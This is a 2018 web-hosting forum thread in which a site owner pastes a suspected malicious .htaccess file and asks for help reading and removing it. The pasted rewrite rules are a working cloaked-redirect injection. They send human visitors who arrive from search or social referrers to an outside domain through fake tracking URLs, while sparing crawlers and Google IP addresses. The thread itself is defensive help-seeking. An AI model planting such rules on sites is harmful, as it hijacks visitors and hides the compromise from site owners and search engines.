What language is this?

247earnings · March 25, 2018, 3:21pm

This is part of a malware file on my server. I want to learn how to read and disable it. I need to learn the language. Can you help?

# <deactivate www.247marketinggroup.com>
# Reason for deactivation: deactivate%20flag
# Please contact us to remedy this situation as soon as possible
RedirectMatch temp .* http://box334.bluehost.com/suspended.page/disabled.cgi/www.247marketinggroup.com
# </deactivate>



<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*bFP.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule .* - [E=bFP:%{TIME_SEC}]
RewriteRule .* - [E=mBZ:ugustus.bristolblog.com]

RewriteCond %{ENV:bFP} 0
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1340684907394&count=none&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&related=kaskus:Official\%20Kaskus\%20Account&size=m&text=\%5BJ-Music\%5D\%5BIDOL\%5D\%5BHello!Project\%5D\%20S/mileage\%20\%E3\%82\%B9\%E3\%83\%9E\%E3\%82\%A4\%E3\%83\%AC\%E3\%83\%BC\%E3\%82\%B8\%20FANS\%20-\%20http\\%3A\\%2F\\%2Fkask.us/7434479\%20\%23kaskus&url=none&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1340676210490101614564553  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11663:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 1
RewriteRule ^.* http://%{ENV:mBZ}/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif?&dcsdat=1341563984319&dcssip=office.microsoft.com&dcsuri=/en-us/images/results.aspx&dcsqry=?qu=business\%2520finance\%26ctt=1&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&WT.tz=7&WT.ti=Search\%20results\%20for\%20business\%20finance\%20-\%20Images\%20and\%20More\%20-\%20Office.com&WT.le=UTF-8&WT.dl=0&WT.ssl=0&WT.es=office.microsoft.com/en-us/images/results.aspx&WT.cg_n=images&WT.z_css=business\%20finance&WT.dcsvid=78d34d2d90963a43998e579cd229c902&WT.z_MUID=2719E8F1F1D16D2116BCEB64F5D16DFA\%26TUID\%3D1&WT.vt_f_tlh=1341563984&WT.vtvs=1341563903678&WT.vtid=2c67220b76d4e7141c11296756165557&WT.co_f=2c67220b76d4e7141c11296756165557&oo_source=Web&oo_orig_appver=ZPP120&oo_ul=en-US&oo_offver=Other&oo_assetid=EC079000012&oo_market=en-US&oo_bc=images&oo_clicktype=1&oo_hash=mt:2\%7C&WT.z_rviewTrig=1&WT.z_tbb=0&WT.z_searchid=c339655f-522e-47b3-beda-e58b0b1637ed&WT.z_filter_evt=1&WT.z_OriginSubweb=Images\%20and\%20More&WT.z_OriginAssetID=EC079000012&WT.z_PageNumber=4&WT.z_PerPage=25&WT.z_Position=76:77:78:79:80:81:82:83:84:85:86:87:88:89:90:91:92:93:94:95:96:97:98:99:100:&WT.z_SearchAssetID=MP900285084:MP900427941:MP900444146:MP900341936:MP900442307:MP900442965:MP900448379:MP900442969:MP900443263:MP900442414:MP900442294:MP900442178:MP900442513:MP900442214:MP900341889:MP900315594:MP900399487:MP900422401:MP900305913:MP900305912:MP900427657:MP900399495:MP900398759:MP900308987:MP900341968:&wtEvtSrc=office.microsoft.com/en-us/images/results.aspx  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11655:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 2
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=6036211&rn=0.39846566036461484&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11524:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 3
RewriteRule ^.* http://%{ENV:mBZ}/s?referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&volume=100&sd=B6F5EF807HH1341227667509892&feature=related&et=3.036&hbd=4301815&el=detailpage&fexp=920704,921602,901700,913542,907335,922600,919306,924700,914030,907344,907217,920706,924500,902518,919324,906043,919316,912706&vtmp=1&hbt=93.915&sendtmp=1&csipt=watch5&hasstoryboard=1&plid=AATD1uag0Iw35kji&nbe=1&ptk=youtube_none&tpmt=2&w=480&cr=ID&h=360&rt=26.339&vid=Dt7x356SANpp6pHxvDgx0IBCzt9RNQE4C&fmt=34&cfps=0&hl=en_US&sdetail=f:related\%2Crv:MUojevLL1pY&bc=283761&bd=217443&screenh=768&playerw=640&bt=19.945&playerh=390&ns=yt&scoville=1&docid=KLU-qbgFSSs&len=45.746&screenw=1024&sourceid=yw&md=1&pd=1.171&lact=15744&vq=auto&fbe=1&fs=0&st=0&mos=0  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9463:/:0:HttpOnly]

SamA74 · March 25, 2018, 3:30pm

It appears to be an Apache .htaccess file.
https://httpd.apache.org/docs/2.4/howto/htaccess.html

Rubble · March 25, 2018, 3:48pm

Do you mean it is still active on your server?

What is the name of the file?

Mittineague · March 25, 2018, 4:10pm

Yes

To me, it looks like bluehost has deactivated the 247marketinggroup site for some reason more than it looks like malware.

In any case, you should contact your host be it bluehost or otherwise and have them fix the problem.

247earnings · March 25, 2018, 10:27pm

It is an .htaccess file in the root directory. What computer language is being used for the script that begins with " RewriteEngine On…?

247earnings · March 25, 2018, 10:29pm

Yes it is an active .htaccess file in the root directory. I believe the file is being created by malicious code contained in the file.

247earnings · March 25, 2018, 10:31pm

Thanks Sam. I know it is an .htaccess file. What I need to know is the programming language for the script that begins at “
RewriteEngine On…”

247earnings · March 25, 2018, 10:37pm

Mittineague Yes, it does appear to be a deactivation file. However, Bluehost denies creating it. Yes, my sites have been deactivated but Bluehost said they do not use a .htaccess file to accomplish deactivation. I have been in contact with Bluehost. While they acknowledge it is not a valid file, they can’t delete it either. I’m stuck until I can delete/modify this .htacess file to render it harmless.

John_Betong · March 25, 2018, 11:37pm

Try Renaming the .htaccess file then use this web page to check the default PHP get_headers( ‘yoursite.com’ );

jb Url Test

Rubble · March 26, 2018, 6:52am

It is a .htaccess file - search for it if you do not belive us.

I do not see how a file can create itself but eitherway somebody put it there and if it is malware it should be removed ASAP.

If my hosts could not remove the file or seem to take no interest in it I would change hosts. You do not say whether Bluehost think it is a piece of Malware.

Your best bet is to do a clean reinstall of everything.

John_Betong · March 26, 2018, 9:50am

I wonder if creating a blank .htaccess file locally and try to overwrite the online .htaccess file would be successful.

247earnings · March 26, 2018, 11:25am

Nice thought but no joy. When I tried to upload and overwrite the .htaccess file I received the following error message:

Upload Canceled: could not copy the file “” to “/home1/.htaccess” due to the following error: Operation not permitted"

;

Gandalf · March 26, 2018, 11:31am

As @Rubble says, it makes no sense that your host cannot delete it. They ought to have full control.

247earnings · March 26, 2018, 11:38am

Rubble. To be clear, I know it is a .htaccess file. What I don’t know is the programming language for the malicious script that follows.

My ISP refuses to get involved with malware. They suggest I hire a security developer to solve the issue.

Yes, I am leaving this host but need to download a Cpanel backup for my next provider. Unfortunately, I can’t do that as long as there is malware infecting my site. I keep getting error messages before the download finishes.

I’m between the proverbial rock and a hard place.

Gandalf · March 26, 2018, 11:41am

You really shouldn’t be taking a backup of it now if it is infected. You could be taking those infections with you to a new host.

Gandalf · March 26, 2018, 11:54am

Just to be clear, that’s no a program and it’s not a programming language. They are .htaccess directives as explained in the link @SamA74 gave.

247earnings · March 26, 2018, 1:16pm

Thanks John but I get a File Op error when trying to rename the .htaccess file. The error result is “Operation not permitted.”

Mittineague · March 26, 2018, 4:32pm

I’m surprised malware would redirect to bluehost and not some mal site.

Anyway, you may be having a problem because of the leading “dot” i.e. .htaccess

I haven’t done so for some time, but years ago I had trouble uploading htaccess files to a host. my solution was to create the file as a txt file - htaccess.txt then rename it to .htaccess and when prompted with overwrite? confirm.

Maybe instead of trying to work directly with the file that’s on the server you’ll be able to replace it that way?

system · June 25, 2018, 11:32pm

This topic was automatically closed 91 days after the last reply. New replies are no longer allowed.